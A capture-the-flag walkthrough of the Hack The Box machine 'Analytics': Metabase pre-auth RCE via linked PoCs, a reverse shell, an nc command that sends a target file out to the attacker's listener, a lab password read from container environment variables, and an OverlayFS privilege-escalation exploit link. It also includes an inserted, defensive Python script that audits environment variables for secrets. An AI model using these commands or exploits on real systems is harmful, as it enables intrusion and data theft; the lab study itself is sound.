Analytics is an easy-rated machine on HTB. The foothold and the user flag are straightforward; the root step taught me a new way of thinking.

Machine information

Techniques needed to complete Analytics:

  • Vulnerability exploitation
  • Common privilege-escalation techniques

Enumeration

Port scan

Port scan with Nmap:

kali@kali ~/D/H/M/Analytics> nmap -p- -n --min-rate 3000 -T4 10.10.11.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 04:52 EST
Warning: 10.10.11.233 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.233
Host is up (0.26s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2976/tcp filtered cns-srv-port
7827/tcp filtered unknown
17394/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 31.76 seconds

Browsing to port 80 redirects to a domain name; after adding it to /etc/hosts the page loads normally.

Clicking the login button redirects to the subdomain data.analytical.htb.

Foothold

The page identifies the application as Metabase, and a quick search shows it has a known pre-auth RCE vulnerability (CVE-2023-38646, see the PoC links below).

https://github.com/m3m0o/metabase-pre-auth-rce-poc.git achieves RCE successfully.

https://github.com/shamo0/CVE-2023-38646-PoC.git does not work.

When catching the reverse shell, pwncat-cs could not receive it properly while nc could, which is a bit odd.

User

After the foothold, run linpeas as before to collect system information.

When pwncat-cs cannot be used for file upload and download:

  • Upload: run python -m http.server 8088 locally to serve files over a simple HTTP server, then fetch them with wget from the reverse shell
  • Download: run nc -lvnp local_port > receive locally to receive the file, and in the reverse shell run nc local_ip local_port < /etc/hosts to send it

The container's environment variables contain user login credentials (the Metabase process was started with them, so anyone with code execution in the container can read them), and they work directly for SSH login to the host.

f2e40e03b7e0:~$ env
env
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=f2e40e03b7e0
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/home/metabase
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
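As an added example (not code from the original write-up), a small Python audit that parses the NUL-separated /proc/<pid>/environ format and flags credential-looking variables such as META_PASS, pairing each with the account variable that shares its prefix. The sample environment is constructed from the key names in the env output above, with the secret value replaced by a placeholder.

```python
import re

# Constructed sample: key names taken from the container's `env` output above,
# with the real secret replaced by a placeholder.
SAMPLE_ENV = {
    "SHELL": "/bin/sh",
    "MB_DB_PASS": "",
    "MB_DB_FILE": "//metabase.db/metabase.db",
    "MB_EMAIL_SMTP_USERNAME": "",
    "META_USER": "metalytics",
    "META_PASS": "<placeholder-password>",
}

# Secret-looking name fragments, anchored on '_' boundaries so that e.g.
# "BYPASS" does not fire; ACCOUNT_KEY_RE names the matching account variable.
SECRET_KEY_RE = re.compile(r"(^|_)(PASS|PASSWD|PASSWORD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)(_|$)")
ACCOUNT_KEY_RE = re.compile(r"(^|_)(USER|USERNAME|LOGIN)(_|$)")

def parse_environ(raw: bytes) -> dict:
    """Parse the NUL-separated KEY=VALUE records of /proc/<pid>/environ."""
    env = {}
    for record in raw.split(b"\0"):
        key, sep, value = record.partition(b"=")
        if sep:  # skips the empty trailing record and malformed entries
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

def audit_env(env: dict) -> list:
    """Return (secret_key, account_key, status) per secret-looking variable.

    account_key shares the secret's prefix (META_USER for META_PASS) or is '';
    status is 'set' for a live value, 'empty' if the app merely expects one.
    """
    findings = []
    for key in sorted(env):
        m = SECRET_KEY_RE.search(key)
        if not m:
            continue
        prefix = key[:m.start()] + "_"  # "META_" for META_PASS, "MB_DB_" for MB_DB_PASS
        account = next((k for k in sorted(env) if k != key and k.startswith(prefix)
                        and ACCOUNT_KEY_RE.search(k)), "")
        findings.append((key, account, "set" if env[key] else "empty"))
    return findings

if __name__ == "__main__":
    for secret, account, status in audit_env(SAMPLE_ENV):
        print(f"{secret:24s} account={account or '-':24s} {status}")
```

On a live host, feed audit_env the bytes of /proc/<pid>/environ via parse_environ; other users' environ files are readable only as root, which is exactly why secrets in a container's environment are exposed to any code running as that container's user.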

Root

For root, again use linpeas to collect information:

╔══════════╣ Container related tools present (if any):
/usr/bin/docker
/usr/bin/runc

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -

lrwxrwxrwx 1 root root 37 Aug 3 18:40 /etc/nginx/sites-enabled/analytical -> /etc/nginx/sites-available/analytical
server {
listen 80;
listen [::]:80;
root /var/www/site;
index index.html;
server_name analytical.htb;
if ($host != analytical.htb) {
rewrite ^ http://analytical.htb/;
}
location / {
try_files $uri $uri/ =404;
}
}
lrwxrwxrwx 1 root root 46 Aug 3 19:17 /etc/nginx/sites-enabled/data.analytical.htb -> /etc/nginx/sites-available/data.analytical.htb
server {
listen 80;
server_name data.analytical.htb;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}


╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it

╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 www-data adm 17619 Dec 12 12:04 /var/log/nginx/access.log

-rw-r--r-- 1 root root 0 Aug 8 11:48 /var/log/nginx/error.log


╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb: 0x0000000000000000=

══╣ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb: 0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/metalytics/.bash_history
/home/metalytics/user.txt
/root/
/var/www

╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/rescan-scsi-bus.sh
/usr/bin/gettext.sh
/usr/bin/dockerd-rootless.sh
/usr/bin/dockerd-rootless-setuptool.sh

2023-08-08+11:53:02.9848993850 /usr/local/sbin/laurel

╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x 3 root root 4096 Aug 8 11:37 .
drwxr-xr-x 18 root root 4096 Aug 8 11:37 ..
drwx--x--x 4 root root 4096 Aug 8 11:37 containerd



╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-2586] nft_object UAF

Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

-rwsr-xr-x 1 root root 331K Aug 24 13:40 /usr/lib/openssh/ssh-keysign

Tried the runc vulnerability for privilege escalation and failed; runc on the box is version 1.1.10, which is not affected.

Pspy also turned up nothing.

In the end, following a hint from a post on the official forum, I searched for vulnerabilities in the operating system itself, and the very first result was the one...
hint

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629.git

Summary

The root part requires a bit more flexible thinking. The connection to the box was unstable and kept stalling, which was a bit annoying.